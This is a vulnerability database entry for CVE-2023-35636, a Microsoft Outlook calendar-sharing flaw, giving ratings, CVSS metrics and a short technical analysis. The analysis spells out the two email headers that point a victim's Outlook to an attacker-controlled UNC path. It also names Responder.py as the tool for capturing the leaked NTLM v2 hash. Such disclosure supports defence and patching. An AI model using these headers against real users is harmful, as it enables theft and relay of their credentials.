Attacker Value
High
(1 user assessed)
Exploitability
High
(1 user assessed)
User Interaction
Required
Privileges Required
None
Attack Vector
Network
2

CVE-2023-35636

Disclosure Date: December 12, 2023
CVE-2023-35636 CVSS v3 Base Score: 6.5
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Credential Access
Techniques
Validation
Validated

Description

Microsoft Outlook Information Disclosure Vulnerability

Add Assessment

2
Ratings
  • Attacker Value
    High
  • Exploitability
    High
Common in enterpriseEasy to weaponizeGives privileged accessRequires user interaction
Technical Analysis

Discovered by Dolev Taler from the Varonis Threat Labs team, CVE-2023-35636 is an exploit of the calendar-sharing function in Microsoft Outlook, whereby adding two headers to an email directs Outlook to share content and contact a designated machine, creating an opportunity to intercept an NTLM v2 hash.

  1. An attacker crafts an email invite to the victim, pointing the “.ICS” file path to the attacker-controlled machine. By “listening” to a self-controlled path (domain, IP, folder path, UNC, etc.), the threat actor can obtain connection attempt packets that contain the hash used to access this resource. Many tools are used to perform this listening, and in the example above, Responder.py was used (the go-to tool for every SMB and NTLM hash attack).
  2. If the victim clicks on the “Open this iCal” button inside the message, their machine will attempt to retrieve the configuration file on the attacker’s machine, exposing the victim’s NTLM hash during authentication.

Exploited headers:
"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics

  1. “Content-Class” = “Sharing” — This tells Outlook that this email contains sharing content.
  2. “x-sharing-config-url” = \(Attacker machine)\a.ics — The second line points the victim’s Outlook to the attacker’s machine.

Usually, NTLM v2 should be used when attempting to authenticate against internal IP-address-based services. However, when the NTLM v2 hash is passing through the open internet, it is vulnerable to relay and offline brute-force attacks.

Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
6.5 Medium
Impact Score:
3.6
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
Required
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
None
Availability (A):
None

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
Microsoft Office 2019 https://aka.ms/OfficeSecurityReleases
Microsoft 365 Apps for Enterprise https://aka.ms/OfficeSecurityReleases
Microsoft Office LTSC 2021 https://aka.ms/OfficeSecurityReleases
Microsoft Office 2016 16.0.5426.1000
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • microsoft

Products

  • 365 apps -,
  • office 2016,
  • office 2019,
  • office long term servicing channel 2021

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis